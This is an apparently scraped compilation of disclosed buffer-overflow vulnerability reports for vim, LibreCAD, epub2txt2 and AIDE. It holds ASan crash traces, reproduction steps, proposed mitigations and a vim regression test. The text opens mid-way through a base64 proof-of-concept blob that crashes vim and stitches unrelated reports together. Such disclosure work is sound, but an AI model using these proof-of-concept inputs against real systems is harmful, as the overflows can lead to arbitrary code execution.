    MDA0MCkpKTAwRjowMMDAwGV4dGAUFBQUD2tuZTAwMDD1LzD/fxUwMDAwMDAwMBNTU1NTU1NTU1NT
    U1NTU1NTMDAwMDAeMDAcMDBwAAEwgAAwODAwMDAwMDA8MDAwMDAwMDBNMDAZMDAwMDAwXzcwMDAw
    MDAwMDAwMDAwMDgwMDAwMDErMDAwLxEwMP8wMDAwMDAwMDMwAAAAQDAwMDAwMDAwMCEwADAwAAAA
    gDAwMBowMDAwTTAwMDAwMDAwMDA3MDAwMDAA/zAICAgWFw6yTyoDZ3kwMPoACiAgMDAwMDAwMAA=" | base64 -d > poc
    
    $ /home/alkyne/fuzzing/vim_asan/src/vim -u NONE -i NONE -n -X -Z -e -m -s -S poc  -c ":qa!"
    ïÿ0 50000000{0-01777777777777777777777ÿò
    ïÿ0 50000000{0-01777777777777777777777ÿò
    =================================================================
    ==3619358==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000007473 at pc 0x000000495b45 bp 0x7ffd1dd9e330 sp 0x7ffd1dd9daf8
    WRITE of size 41 at 0x602000007473 thread T0
        #0 0x495b44 in __asan_memmove (/home/alkyne/fuzzing/vim_asan/src/vim+0x495b44)
        #1 0x51ee94 in memmove /usr/include/x86_64-linux-gnu/bits/string_fortified.h:40:10
        #2 0x51ee94 in ins_char_bytes /home/alkyne/fuzzing/vim_asan/src/change.c:1094:2
        #3 0x51f6fe in ins_char /home/alkyne/fuzzing/vim_asan/src/change.c:1003:5
        #4 0x988589 in swapchar /home/alkyne/fuzzing/vim_asan/src/ops.c:1445:6
        #5 0x99b554 in swapchars /home/alkyne/fuzzing/vim_asan/src/ops.c:1379:16
        #6 0x99b554 in op_tilde /home/alkyne/fuzzing/vim_asan/src/ops.c:1303:17
        #7 0x99b554 in do_pending_operator /home/alkyne/fuzzing/vim_asan/src/ops.c:4109:3
        #8 0x93bb29 in normal_cmd /home/alkyne/fuzzing/vim_asan/src/normal.c:1146:2
        #9 0x70ce2b in exec_normal /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c
        #10 0x70bb3c in exec_normal_cmd /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c:8601:5
        #11 0x70bb3c in ex_normal /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c:8519:6
        #12 0x6e337c in do_one_cmd /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c:2573:2
        #13 0x6e337c in do_cmdline /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c:993:17
        #14 0xbbae2d in do_source /home/alkyne/fuzzing/vim_asan/src/scriptfile.c:1512:5
        #15 0xbb8e8c in cmd_source /home/alkyne/fuzzing/vim_asan/src/scriptfile.c:1098:14
        #16 0xbb8e8c in ex_source /home/alkyne/fuzzing/vim_asan/src/scriptfile.c:1124:2
        #17 0x6e337c in do_one_cmd /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c:2573:2
        #18 0x6e337c in do_cmdline /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c:993:17
        #19 0xf99d44 in exe_commands /home/alkyne/fuzzing/vim_asan/src/main.c:3091:2
        #20 0xf99d44 in vim_main2 /home/alkyne/fuzzing/vim_asan/src/main.c:774:2
        #21 0xf9677f in main /home/alkyne/fuzzing/vim_asan/src/main.c:426:12
        #22 0x7fdf81c100b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
        #23 0x41da9d in _start (/home/alkyne/fuzzing/vim_asan/src/vim+0x41da9d)
    
    0x602000007473 is located 0 bytes to the right of 3-byte region [0x602000007470,0x602000007473)
    allocated by thread T0 here:
        #0 0x4961dd in malloc (/home/alkyne/fuzzing/vim_asan/src/vim+0x4961dd)
        #1 0x4c5e15 in lalloc /home/alkyne/fuzzing/vim_asan/src/alloc.c:248:11
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/alkyne/fuzzing/vim_asan/src/vim+0x495b44) in __asan_memmove
    Shadow bytes around the buggy address:
      0x0c047fff8e30: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff8e40: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff8e50: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff8e60: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff8e70: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
    =>0x0c047fff8e80: fa fa 02 fa fa fa 03 fa fa fa 01 fa fa fa[03]fa
      0x0c047fff8e90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8ea0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8eb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8ec0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8ed0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==3619358==ABORTING
    
    

**Impact**

Heap Overflow may lead to execute arbitrary code.

CVE-2022-0361: Heap-based Buffer Overflow in vim

CVE-2022-0359: Heap-based Buffer Overflow in vim

A buffer overflow vulnerability in CDataList of the jwwlib component of LibreCAD 2.2.0-rc3 and older allows an attacker to achieve Remote Code Execution using a crafted JWW document.

**Vulnerable Products**

*   LibreCAD 2.2.0-rc3 and older

**Steps to reproduce or sample file**

1.  Start LibreCAD 2.2.0 in a debugger
    
2.  File/Open...
    
3.  Unzip and open the attached proof-of-concept file
    
4.  Observe ACCESS_VIOLATION crash, with eip=0x41414141 (AAAA)
    

Screenshot:

**Cause**

The CDataList entity deserialization in LibreCAD/libraries/jwwlib/src/jwwdoc.h is vulnerable to a stack buffer overflow. char buf[512] declared in CDataList::Serialize() on line 784 is of fixed size 512. One variety of CDataList provides its own size field, as seen on line 795 and no bounds checking is performed. This allows an attacker to overflow buf and overwrite other stack variables, including the return address.

The attached PoC file is tuned to trigger this behavior in the latest windows release of LibreCAD, but the same bug is also present  
in older versions and on other platforms.

**Note**: This is similar to, but distinct from issue #1462

**Impact**

An attacker can craft a JW-CAD input file and thereby gain control over execution flow (EIP controlled directly).

This allows an attacker to run arbitrary code on the system running LibreCAD, with the privileges of the current user.

**Proposed Mitigation**

1.  Perform bounds checking in CDataList::Serialize(), and refuse to load more data to buf than actually supported.
2.  Enable stack smashing protection in the windows build of LibreCAD.

**Operating System and LibreCAD version info**

Version: 2.2.0-rc3  
Compiler: GNU GCC 7.3.0  
Compiled on: Nov 29 2021  
Qt Version: 5.12.4  
Boost Version: 1.65.1  
System: Windows 10 (10.0)

CVE-2021-45342: Remote Code Execution vulnerability in LibreCAD 2.2.0-rc3 (JWW CDataList) · Issue #1464 · LibreCAD/LibreCAD

A buffer overflow vulnerability in CDataMoji of the jwwlib component of LibreCAD 2.2.0-rc3 and older allows an attacker to achieve Remote Code Execution using a crafted JWW document.

**Vulnerable Products**

*   LibreCAD 2.2.0-rc3 and older
*   Jw\_cad 8.24a and older

**Steps to reproduce or sample file**

1.  Start LibreCAD 2.2.0-rc3 in a debugger
2.  File/Open...
3.  Unzip and open the attached proof of concept file
4.  Observe ACCESS_VIOLATION crash, with eip=0x41414141 (AAAA)

Screenshot:

**Cause**

The CDataMoji entity deserialization at LibreCAD/libraries/jwwlib/src/jwwdoc.h is vulnerable to  
a stack buffer overflow.  
char buf[512] declared in CDataMoji::Serialize() on line 512  
is of fixed size 512. Some varieties of CDataMoji provide their own size, e.g. MojiData2 on line 523  
and no bounds checking is performed. This allows an attacker to overflow buf and overwrite other stack variables,  
including the return address.

The attached PoC file is tuned to trigger this behavior in the latest windows release of LibreCAD, but the same bug is also present  
in older versions and on other platforms.

**Impact**

An attacker can craft a JW-CAD input file and thereby gain control over execution flow (EIP controlled directly).

This allows an attacker to run arbitrary code on the system running LibreCAD, with the privileges of the current user.

**Proposed Mitigation**

1.  Perform bounds checking in CDataMoji::Serialize(), and refuse to load the file if it would overflow buf.
2.  Enable stack smashing protection in the windows build of LibreCAD.

**Operating System and LibreCAD version info**

Version: 2.2.0-rc3  
Compiler: GNU GCC 7.3.0  
Compiled on: Nov 29 2021  
Qt Version: 5.12.4  
Boost Version: 1.65.1  
System: Windows 10 (10.0)

CVE-2021-45341: Remote Code Execution vulnerability in LibreCAD 2.2.0-rc3 (JWW CDataMoji) · Issue #1462 · LibreCAD/LibreCAD

xhtml_translate_entity in xhtml.c in epub2txt (aka epub2txt2) through 2.02 allows a stack-based buffer overflow via a crafted EPUB document.

**Description**

A stack-buffer-overflow was discovered in epub2txt2.  
The issue is being triggered in function xhtml\_translate\_entity() at src/xhtml.c:576

**Version**

Version 2.02 (Lastest)

**Environment**

Ubuntu 18.04, 64bit

**Reproduce****Command**

    git clone the Lastest Version firstly.
    make && make install
    ./epub2txt poc
    

POC file at the bottom of this report.

**With ASAN**

Note: You can use ASAN for more direct verification.

    Compile program with address sanitizer with this command:
    VERSION := 2.02
    CC      := gcc
    CFLAGS  := -Wall -fPIC -fPIE
    LDLAGS  := -pie 
    DESTDIR :=
    PREFIX  := /usr
    BINDIR  := /bin
    MANDIR  := /share/man
    APPNAME := epub2txt
    
    TARGET	:= epub2txt 
    SOURCES := $(shell find src/ -type f -name *.c)
    OBJECTS := $(patsubst src/%,build/%,$(SOURCES:.c=.o))
    DEPS	:= $(OBJECTS:.o=.deps)
    
    $(TARGET): $(OBJECTS)
    	$(CC) -fsanitize=address -o $(TARGET) $(LDFLAGS) $(OBJECTS) 
    
    build/%.o: src/%.c
    	@mkdir -p build/
    	$(CC) $(CFLAGS) -fsanitize=address -g -DVERSION=\"$(VERSION)\" -DAPPNAME=\"$(APPNAME)\" -MD -MF $(@:.o=.deps) -c -o $@ $< 
    
    clean:
    	$(RM) -r build/ $(TARGET) 
    
    install:
    	install -D -m 755 $(APPNAME) $(DESTDIR)/$(PREFIX)/$(BINDIR)/$(APPNAME)
    	install -D -m 644 man1/epub2txt.1 $(DESTDIR)/$(PREFIX)/$(MANDIR)/man1/epub2txt.1
    
    uninstall:
    	rm -f $(DESTDIR)/$(PREFIX)/$(BINDIR)/$(APPNAME)
    	rm -f $(DESTDIR)/$(PREFIX)/$(MANDIR)/man1/epub2txt.1
    
    -include $(DEPS)
    
    .PHONY: clean install
    
    

**ASAN Report**

    warning [./input/id:000029,sig:11,src:000553,time:174169875,op:havoc,rep:4]:  3 extra bytes at beginning or within zipfile
      (attempting to process anyway)
    file #1:  bad zipfile offset (local header sig):  3
      (attempting to re-compensate)
    /tmp/epub2txt14993/OEBPS/cover.xml  bad CRC aa74ee30  (should be 4874d916)
      error:  invalid compressed data to inflate /tmp/epub2txt14993/OEBPS/images/GeographyofBli-cover.jpg
    file #8:  bad zipfile offset (local header sig):  163411
      (attempting to re-compensate)
    file #8:  bad zipfile offset (local header sig):  163411
    file #9:  bad zipfile offset (local header sig):  181495
    /tmp/epub2txt14993/OEBPS/GeographyofBli_toc.html  bad CRC 0938f2f2  (should be 64dedce7)
    /tmp/epub2txt14993/OEBPS/GeographyofBli_copyright.html  bad CRC 5d8cbd1a  (should be 9b5bfa5d)
    /tmp/epub2txt14993/OEBPS/GeographyofBli_body_split_001.html  bad CRC 1a36209f  (should be 81fec8f3)
    =================================================================
    ==14993==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffffcb14 at pc 0x7ffff6e7e3a6 bp 0x7fffffffca60 sp 0x7fffffffc208
    WRITE of size 305 at 0x7fffffffcb14 thread T0
        #0 0x7ffff6e7e3a5  (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x663a5)
        #1 0x55555558000e in xhtml_translate_entity src/xhtml.c:576
        #2 0x555555580b34 in xhtml_to_stdout src/xhtml.c:789
        #3 0x555555580680 in xhtml_file_to_stdout src/xhtml.c:700
        #4 0x555555560476 in epub2txt_do_file src/epub2txt.c:494
        #5 0x55555555d3c9 in main src/main.c:187
        #6 0x7ffff6a48bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
        #7 0x55555555c219 in _start (/home/nisl1/nisl8121/Asteriska/fuzz/projects/epub2txt2-master/valid/epub2txt+0x8219)
    
    Address 0x7fffffffcb14 is located in stack of thread T0 at offset 116 in frame
        #0 0x55555557fad4 in xhtml_translate_entity src/xhtml.c:532
    
      This frame has 2 object(s):
        [32, 36) 'v'
        [96, 116) 'out' <== Memory access at offset 116 overflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x663a5) 
    Shadow bytes around the buggy address:
      0x10007fff7910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7920: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7950: 00 00 00 00 f1 f1 f1 f1 04 f2 f2 f2 f2 f2 f2 f2
    =>0x10007fff7960: 00 00[04]f2 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7980: 00 00 f1 f1 f1 f1 f8 f2 f2 f2 00 00 00 00 00 00
      0x10007fff7990: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2
      0x10007fff79a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff79b0: 00 00 00 00 00 00 f1 f1 f1 f1 f8 f2 f2 f2 f2 f2
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==14993==ABORTING
    
    

**POC**

POC

Any issue plz contact with me:  
admin@hack.best  
OR:  
twitter: @Asteriska8

CVE-2022-23850: [Bug Report]stack-buffer-overflow in Function epub2txt_do_file() AT src/epub2txt.c · Issue #17 · kevinboone/epub2txt2

Heap-based Buffer Overflow in vim/vim prior to 8.2.

@@ -1309,5 +1309,14 @@ func Test\_visual\_reselect\_with\_count()

call delete('XvisualReselect')

endfunc

  

func Test\_visual\_block\_insert\_round\_off()

new

" The number of characters are tuned to fill a 4096 byte allocated block,

" so that valgrind reports going over the end.

call setline(1, \['xxxxx', repeat('0', 1350), "\\t", repeat('x', 60)\])

exe "normal gg0\\<C-V>GI" .. repeat('0', 1320) .. "\\<Esc>"

bwipe!

endfunc

  

  

" vim: shiftwidth\=2 sts\=2 expandtab

CVE-2022-0318: patch 8.2.4151: reading beyond the end of a line · vim/vim@57df9e8

AIDE before 0.17.4 allows local users to obtain root privileges via crafted file metadata (such as XFS extended attributes or tmpfs ACLs), because of a heap-based buffer overflow.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

Tag

#buffer_overflow